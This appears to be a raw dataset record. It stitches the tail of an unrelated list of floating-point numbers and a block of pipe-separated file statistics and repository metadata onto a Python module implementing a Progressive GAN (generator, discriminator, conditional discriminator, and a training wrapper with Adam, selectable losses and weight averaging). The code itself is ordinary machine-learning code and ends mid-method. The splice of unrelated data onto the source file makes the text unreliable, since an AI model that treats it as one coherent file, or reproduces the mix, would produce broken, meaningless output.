2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -1.2303358065578323, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -1.2303358065578323, -3.2303358065578323, 
-2.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -4.230335806557832, -4.230335806557832, -4.230335806557832, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 2.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, 3.7696641934421677, 4.769664193442168, 4.769664193442168, 2.7696641934421677, 2.7696641934421677, 5.769664193442168, 4.769664193442168, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 3.7696641934421677, 1.7696641934421677, -2.2303358065578323, -3.2303358065578323, -4.230335806557832, -3.2303358065578323, -2.2303358065578323, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 3.7696641934421677, 4.769664193442168, 3.7696641934421677, 2.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -4.230335806557832, -4.230335806557832, -1.2303358065578323, -2.2303358065578323, 
-1.2303358065578323, -1.2303358065578323, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, -1.2303358065578323, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, -2.2303358065578323, -1.2303358065578323, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -2.2303358065578323, -0.23033580655783226, 1.7696641934421677, 3.7696641934421677, 3.7696641934421677, 1.7696641934421677, 2.7696641934421677, 4.769664193442168, 4.769664193442168, 3.7696641934421677, 2.7696641934421677, 2.7696641934421677, 2.7696641934421677, 3.7696641934421677, 2.7696641934421677, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 3.7696641934421677, 1.7696641934421677, -1.2303358065578323, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, 0.7696641934421677, 0.7696641934421677, 
-1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -3.2303358065578323, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, -0.23033580655783226, -3.2303358065578323, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -3.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, 2.7696641934421677, 5.769664193442168, 5.769664193442168, 4.769664193442168, 4.769664193442168, 3.7696641934421677, 4.769664193442168, 4.769664193442168, 3.7696641934421677, 2.7696641934421677, 3.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, 1.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -1.2303358065578323, -3.2303358065578323, -4.230335806557832, 
-7.230335806557832, -6.230335806557832, -2.2303358065578323, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 4.769664193442168, 4.769664193442168, 5.769664193442168, 2.7696641934421677, 3.7696641934421677, 5.769664193442168, 3.7696641934421677, 1.7696641934421677, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -3.2303358065578323, -3.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -4.230335806557832, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -1.2303358065578323, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 2.7696641934421677, 0.7696641934421677, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 4.769664193442168, 3.7696641934421677, 3.7696641934421677, 3.7696641934421677, 4.769664193442168, 5.769664193442168, 4.769664193442168, 2.7696641934421677, 2.7696641934421677, 1.7696641934421677, 0.7696641934421677, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -6.230335806557832, -5.230335806557832, -5.230335806557832, -5.230335806557832, -4.230335806557832, -6.230335806557832, -4.230335806557832, -3.2303358065578323, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -1.2303358065578323, 
-0.23033580655783226, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, 2.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -3.2303358065578323, -4.230335806557832, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 2.7696641934421677, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, -2.2303358065578323, -0.23033580655783226, 1.7696641934421677, 2.7696641934421677, 2.7696641934421677, 0.7696641934421677, 1.7696641934421677, 4.769664193442168, 4.769664193442168, 4.769664193442168, 1.7696641934421677, 2.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 3.7696641934421677, 3.7696641934421677, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 
1.7696641934421677, 1.7696641934421677, -1.2303358065578323, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 2.7696641934421677, 2.7696641934421677, 0.7696641934421677, -0.23033580655783226, 1.7696641934421677, 3.7696641934421677, 4.769664193442168, 4.769664193442168, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 3.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, 2.7696641934421677, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -1.2303358065578323, -1.2303358065578323, -1.2303358065578323, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 2.7696641934421677, 4.769664193442168, 2.7696641934421677, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 
1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -3.2303358065578323, -1.2303358065578323, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 2.7696641934421677, 2.7696641934421677, -0.23033580655783226, -3.2303358065578323, -2.2303358065578323, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, 1.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -4.230335806557832, -3.2303358065578323, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, 
-0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 3.7696641934421677, 4.769664193442168, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 2.7696641934421677, 1.7696641934421677, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -2.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -2.2303358065578323, 0.7696641934421677, 0.7696641934421677, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, 2.7696641934421677, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, 
-2.2303358065578323, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 2.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677]
| 2,597.375
| 20,691
| 0.827181
| 2,016
| 20,779
| 8.525298
| 0.014385
| 0.19794
| 0.226567
| 0.106825
| 0.990342
| 0.968057
| 0.955024
| 0.897888
| 0.804503
| 0.65951
| 0
| 0.867308
| 0.04904
| 20,779
| 8
| 20,691
| 2,597.375
| 0.00248
| 0.003706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
ac219555012cd1c763fa6e5095feda0ffadaeb49
| 24,999
|
py
|
Python
|
GAN/networks/PRO_GAN.py
|
MacroHardGang/desegan
|
d7cdd39c8c9de76f6d5b5a36cee3d8850b177687
|
[
"MIT"
] | null | null | null |
GAN/networks/PRO_GAN.py
|
MacroHardGang/desegan
|
d7cdd39c8c9de76f6d5b5a36cee3d8850b177687
|
[
"MIT"
] | 6
|
2018-09-15T04:44:34.000Z
|
2019-04-14T07:10:12.000Z
|
GAN/networks/PRO_GAN.py
|
MacroHardGang/desegan
|
d7cdd39c8c9de76f6d5b5a36cee3d8850b177687
|
[
"MIT"
] | 1
|
2019-03-14T15:49:45.000Z
|
2019-03-14T15:49:45.000Z
|
""" Module implementing GAN which will be trained using the Progressive growing
technique -> https://arxiv.org/abs/1710.10196
"""
import numpy as np
import torch as th
class Generator(th.nn.Module):
""" Generator of the GAN network """
def __init__(self, depth=7, latent_size=512, use_eql=True):
"""
constructor for the Generator class
:param depth: required depth of the Network
:param latent_size: size of the latent manifold
:param use_eql: whether to use equalized learning rate
"""
from torch.nn import ModuleList, Upsample
from networks.CustomLayers import GenGeneralConvBlock, GenInitialBlock
super(Generator, self).__init__()
assert latent_size != 0 and ((latent_size & (latent_size - 1)) == 0), \
"latent size not a power of 2"
if depth >= 4:
assert latent_size >= np.power(2, depth - 4), "latent size will diminish to zero"
# state of the generator:
self.use_eql = use_eql
self.depth = depth
self.latent_size = latent_size
# register the modules required for the GAN
self.initial_block = GenInitialBlock(self.latent_size, use_eql=self.use_eql)
# create a module list of the other required general convolution blocks
self.layers = ModuleList([]) # initialize to empty list
# create the ToRGB layers for various outputs:
if self.use_eql:
from networks.CustomLayers import _equalized_conv2d
self.toRGB = lambda in_channels: \
_equalized_conv2d(in_channels, 3, (1, 1), bias=True)
else:
from torch.nn import Conv2d
self.toRGB = lambda in_channels: Conv2d(in_channels, 3, (1, 1), bias=True)
self.rgb_converters = ModuleList([self.toRGB(self.latent_size)])
# create the remaining layers
for i in range(self.depth - 1):
if i <= 2:
layer = GenGeneralConvBlock(self.latent_size,
self.latent_size, use_eql=self.use_eql)
rgb = self.toRGB(self.latent_size)
else:
layer = GenGeneralConvBlock(
int(self.latent_size // np.power(2, i - 3)),
int(self.latent_size // np.power(2, i - 2)),
use_eql=self.use_eql
)
rgb = self.toRGB(int(self.latent_size // np.power(2, i - 2)))
self.layers.append(layer)
self.rgb_converters.append(rgb)
# register the temporary upsampler
self.temporaryUpsampler = Upsample(scale_factor=2)
def forward(self, x, depth, alpha):
"""
forward pass of the Generator
:param x: input noise
:param depth: current depth from where output is required
:param alpha: value of alpha for fade-in effect
:return: y => output
"""
assert depth < self.depth, "Requested output depth cannot be produced"
y = self.initial_block(x)
if depth > 0:
for block in self.layers[:depth - 1]:
y = block(y)
residual = self.rgb_converters[depth - 1](self.temporaryUpsampler(y))
straight = self.rgb_converters[depth](self.layers[depth - 1](y))
out = (alpha * straight) + ((1 - alpha) * residual)
else:
out = self.rgb_converters[0](y)
return out
class Discriminator(th.nn.Module):
""" Discriminator of the GAN """
def __init__(self, height=7, feature_size=512, use_eql=True):
"""
constructor for the class
:param height: total height of the discriminator (Must be equal to the Generator depth)
:param feature_size: size of the deepest features extracted
(Must be equal to Generator latent_size)
:param use_eql: whether to use equalized learning rate
"""
from torch.nn import ModuleList, AvgPool2d
from networks.CustomLayers import DisGeneralConvBlock, DisFinalBlock
super(Discriminator, self).__init__()
assert feature_size != 0 and ((feature_size & (feature_size - 1)) == 0), \
"latent size not a power of 2"
if height >= 4:
assert feature_size >= np.power(2, height - 4), "feature size cannot be produced"
# create state of the object
self.use_eql = use_eql
self.height = height
self.feature_size = feature_size
self.final_block = DisFinalBlock(self.feature_size, use_eql=self.use_eql)
# create a module list of the other required general convolution blocks
self.layers = ModuleList([]) # initialize to empty list
# create the fromRGB layers for various inputs:
if self.use_eql:
from networks.CustomLayers import _equalized_conv2d
self.fromRGB = lambda out_channels: \
_equalized_conv2d(3, out_channels, (1, 1), bias=True)
else:
from torch.nn import Conv2d
self.fromRGB = lambda out_channels: Conv2d(3, out_channels, (1, 1), bias=True)
self.rgb_to_features = ModuleList([self.fromRGB(self.feature_size)])
# create the remaining layers
for i in range(self.height - 1):
if i > 2:
layer = DisGeneralConvBlock(
int(self.feature_size // np.power(2, i - 2)),
int(self.feature_size // np.power(2, i - 3)),
use_eql=self.use_eql
)
rgb = self.fromRGB(int(self.feature_size // np.power(2, i - 2)))
else:
layer = DisGeneralConvBlock(self.feature_size,
self.feature_size, use_eql=self.use_eql)
rgb = self.fromRGB(self.feature_size)
self.layers.append(layer)
self.rgb_to_features.append(rgb)
# register the temporary downSampler
self.temporaryDownsampler = AvgPool2d(2)
def forward(self, x, height, alpha):
"""
forward pass of the discriminator
:param x: input to the network
:param height: current height of operation (Progressive GAN)
:param alpha: current value of alpha for fade-in
:return: out => raw prediction values (WGAN-GP)
"""
assert height < self.height, "Requested output depth cannot be produced"
if height > 0:
residual = self.rgb_to_features[height - 1](self.temporaryDownsampler(x))
straight = self.layers[height - 1](
self.rgb_to_features[height](x)
)
y = (alpha * straight) + ((1 - alpha) * residual)
for block in reversed(self.layers[:height - 1]):
y = block(y)
else:
y = self.rgb_to_features[0](x)
out = self.final_block(y)
return out
class ConditionalDiscriminator(th.nn.Module):
""" Discriminator of the GAN """
def __init__(self, height=7, feature_size=512,
compressed_latent_size=128, use_eql=True):
"""
constructor for the class
:param height: total height of the discriminator (Must be equal to the Generator depth)
:param feature_size: size of the deepest features extracted
(Must be equal to Generator latent_size)
:param compressed_latent_size: size of the compressed version
:param use_eql: whether to use equalized learning rate
"""
from torch.nn import ModuleList, AvgPool2d
from networks.CustomLayers import DisGeneralConvBlock, ConDisFinalBlock
super(ConditionalDiscriminator, self).__init__()
assert feature_size != 0 and ((feature_size & (feature_size - 1)) == 0), \
"latent size not a power of 2"
if height >= 4:
assert feature_size >= np.power(2, height - 4), "feature size cannot be produced"
# create state of the object
self.use_eql = use_eql
self.height = height
self.feature_size = feature_size
self.compressed_latent_size = compressed_latent_size
self.final_block = ConDisFinalBlock(self.feature_size, self.feature_size,
self.compressed_latent_size, use_eql=self.use_eql)
# create a module list of the other required general convolution blocks
self.layers = ModuleList([]) # initialize to empty list
# create the fromRGB layers for various inputs:
if self.use_eql:
from networks.CustomLayers import _equalized_conv2d
self.fromRGB = lambda out_channels: \
_equalized_conv2d(3, out_channels, (1, 1), bias=True)
else:
from torch.nn import Conv2d
self.fromRGB = lambda out_channels: Conv2d(3, out_channels, (1, 1), bias=True)
self.rgb_to_features = ModuleList([self.fromRGB(self.feature_size)])
# create the remaining layers
for i in range(self.height - 1):
if i > 2:
layer = DisGeneralConvBlock(
int(self.feature_size // np.power(2, i - 2)),
int(self.feature_size // np.power(2, i - 3)),
use_eql=self.use_eql
)
rgb = self.fromRGB(int(self.feature_size // np.power(2, i - 2)))
else:
layer = DisGeneralConvBlock(self.feature_size,
self.feature_size, use_eql=self.use_eql)
rgb = self.fromRGB(self.feature_size)
self.layers.append(layer)
self.rgb_to_features.append(rgb)
# register the temporary downSampler
self.temporaryDownsampler = AvgPool2d(2)
def forward(self, x, latent_vector, height, alpha):
"""
forward pass of the discriminator
:param x: input to the network
:param latent_vector: latent vector required for conditional discrimination
:param height: current height of operation (Progressive GAN)
:param alpha: current value of alpha for fade-in
:return: out => raw prediction values
"""
assert height < self.height, "Requested output depth cannot be produced"
if height > 0:
residual = self.rgb_to_features[height - 1](self.temporaryDownsampler(x))
straight = self.layers[height - 1](
self.rgb_to_features[height](x)
)
y = (alpha * straight) + ((1 - alpha) * residual)
for block in reversed(self.layers[:height - 1]):
y = block(y)
else:
y = self.rgb_to_features[0](x)
out = self.final_block(y, latent_vector)
return out
class ProGAN:
    """ Wrapper around the Generator and the Discriminator.

    Owns both networks, their Adam optimizers, the GAN loss object and
    (optionally) an exponential moving average of the generator weights.
    """

    def __init__(self, depth=7, latent_size=512, learning_rate=0.001, beta_1=0,
                 beta_2=0.99, eps=1e-8, drift=0.001, n_critic=1, use_eql=True,
                 loss="wgan-gp", use_ema=True, ema_decay=0.999,
                 device=th.device("cuda")):
        """
        constructor for the class
        :param depth: depth of the GAN (will be used for each generator and discriminator)
        :param latent_size: latent size of the manifold used by the GAN
        :param learning_rate: learning rate for Adam
        :param beta_1: beta_1 for Adam
        :param beta_2: beta_2 for Adam
        :param eps: epsilon for Adam
        :param n_critic: number of times to update discriminator
                         (Used only if loss is wgan or wgan-gp)
        :param drift: drift penalty coefficient
                      (Used only if loss is wgan or wgan-gp)
        :param use_eql: whether to use equalized learning rate
        :param loss: the loss function to be used
                     Can either be a string =>
                     ["wgan-gp", "wgan", "lsgan", "lsgan-with-sigmoid"]
                     Or an instance of GANLoss
        :param use_ema: boolean for whether to use exponential moving averages
        :param ema_decay: value of mu for ema
        :param device: device to run the GAN on (GPU / CPU)
        """
        from torch.optim import Adam

        # Create the Generator and the Discriminator
        self.gen = Generator(depth, latent_size, use_eql=use_eql).to(device)
        self.dis = Discriminator(depth, latent_size, use_eql=use_eql).to(device)

        # state of the object
        self.latent_size = latent_size
        self.depth = depth
        self.use_ema = use_ema
        self.ema_decay = ema_decay
        self.n_critic = n_critic
        self.use_eql = use_eql
        self.device = device
        self.drift = drift

        # define the optimizers for the discriminator and generator
        self.gen_optim = Adam(self.gen.parameters(), lr=learning_rate,
                              betas=(beta_1, beta_2), eps=eps)
        self.dis_optim = Adam(self.dis.parameters(), lr=learning_rate,
                              betas=(beta_1, beta_2), eps=eps)

        # define the loss function used for training the GAN
        self.loss = self.__setup_loss(loss)

        # setup the ema for the generator
        if self.use_ema:
            from networks.CustomLayers import EMA
            self.ema = EMA(self.ema_decay)
            self.__register_generator_to_ema()

    def __register_generator_to_ema(self):
        # register every trainable generator parameter with the EMA tracker
        for name, param in self.gen.named_parameters():
            if param.requires_grad:
                self.ema.register(name, param.data)

    def __apply_ema_on_generator(self):
        # overwrite generator weights with their smoothed (EMA) values
        for name, param in self.gen.named_parameters():
            if param.requires_grad:
                param.data = self.ema(name, param.data)

    def __setup_loss(self, loss):
        """Resolve *loss* (a string key or a GANLoss instance) into a GANLoss object."""
        import networks.Losses as losses

        if isinstance(loss, str):
            loss = loss.lower()  # lowercase the string
            if loss == "wgan":
                loss = losses.WGAN_GP(self.device, self.dis, self.drift, use_gp=False)
                # note if you use just wgan, you will have to use weight clipping
                # in order to prevent gradient exploding
            elif loss == "wgan-gp":
                loss = losses.WGAN_GP(self.device, self.dis, self.drift, use_gp=True)
            elif loss == "lsgan":
                loss = losses.LSGAN(self.device, self.dis)
            elif loss == "lsgan-with-sigmoid":
                loss = losses.LSGAN_SIGMOID(self.device, self.dis)
            else:
                raise ValueError("Unknown loss function requested")
        elif not isinstance(loss, losses.GANLoss):
            raise ValueError("loss is neither an instance of GANLoss nor a string")
        return loss

    def optimize_discriminator(self, noise, real_batch, depth, alpha):
        """
        performs one step of weight update on discriminator using the batch of data
        :param noise: input noise of sample generation
        :param real_batch: real samples batch
        :param depth: current depth of optimization
        :param alpha: current alpha for fade-in
        :return: current loss (Wasserstein loss)
        """
        from torch.nn import AvgPool2d
        # BUGFIX: torch.nn.functional.upsample is deprecated; interpolate is the
        # drop-in replacement (both default to nearest-neighbour mode).
        from torch.nn.functional import interpolate

        # downsample the real_batch for the given depth
        down_sample_factor = int(np.power(2, self.depth - depth - 1))
        prior_downsample_factor = max(int(np.power(2, self.depth - depth)), 0)
        ds_real_samples = AvgPool2d(down_sample_factor)(real_batch)
        if depth > 0:
            # one resolution lower, scaled back up for the fade-in blend
            prior_ds_real_samples = interpolate(AvgPool2d(prior_downsample_factor)(real_batch),
                                                scale_factor=2)
        else:
            prior_ds_real_samples = ds_real_samples

        # real samples are a combination of ds_real_samples and prior_ds_real_samples
        real_samples = (alpha * ds_real_samples) + ((1 - alpha) * prior_ds_real_samples)

        loss_val = 0
        for _ in range(self.n_critic):
            # generate a batch of samples (detached: no generator gradients here)
            fake_samples = self.gen(noise, depth, alpha).detach()
            loss = self.loss.dis_loss(real_samples, fake_samples, depth, alpha)

            # optimize discriminator
            self.dis_optim.zero_grad()
            loss.backward()
            self.dis_optim.step()

            loss_val += loss.item()

        return loss_val / self.n_critic

    def optimize_generator(self, noise, depth, alpha):
        """
        performs one step of weight update on generator for the given batch_size
        :param noise: input random noise required for generating samples
        :param depth: depth of the network at which optimization is done
        :param alpha: value of alpha for fade-in effect
        :return: current loss (Wasserstein estimate)
        """
        # generate fake samples:
        fake_samples = self.gen(noise, depth, alpha)

        # TODO: Change this implementation for making it compatible for relativisticGAN
        loss = self.loss.gen_loss(None, fake_samples, depth, alpha)

        # optimize the generator
